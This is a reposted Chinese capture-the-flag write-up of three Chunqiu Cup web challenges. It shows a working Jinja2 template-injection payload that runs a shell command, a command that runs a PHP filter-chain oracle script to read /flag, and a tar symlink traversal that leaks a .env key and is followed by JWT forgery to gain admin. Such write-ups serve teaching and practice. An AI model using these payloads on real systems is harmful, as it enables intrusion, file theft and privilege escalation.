欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 汽车 > 新车 > 春秋杯-WEB

春秋杯-WEB

2025/1/19 3:28:46 来源:https://blog.csdn.net/2301_80148821/article/details/145213301  浏览:    关键词:春秋杯-WEB

SSTI

可以看到主页那里有个登录测试之后为ssti

{{4*4}}

fenjing梭哈即可得到payload

{{((g.pop.__globals__.__builtins__.__import__('os')).popen('cat flag')).read()}}

file_copy

看到题目名字为file_copy,

当输入路径时会返回目标文件的大小,
![[Pasted image 20250117160619.png]]

通过返回包,可以看到PHP版本为8.1.31

从而找到DownUnder CTF 2022 的题目

https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle#/

通过github脚本进行读取flag
https://github.com/synacktiv/php_filter_chains_oracle_exploit/tree/main?tab=readme-ov-file#/

python3 filters_chain_oracle_exploit.py --target http://eci-2ze4o9fodim6wmt5gbgp.cloudeci1.ichunqiu.com/ --file '/flag' --parameter path

运行得到flag

Gotar

先随便创建一个账号,然后登录。

创建一个软链接

ln -s ../../../.env links

然后将文件夹解压

tar -cf link.tar links

上传

通过代码审计可以得出链接位置

const (  uploadDir    = "./assets/uploads"  extractedDir = "./assets/extracted"  
)

一个为上传位置,另一个为解压位置

拼接得到软链接的路径

assets/extracted/2/links

得到key

然后进行jwt伪造

id改为1admin改成true。

得到flag

![[Pasted image 20250117153440.png]]

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com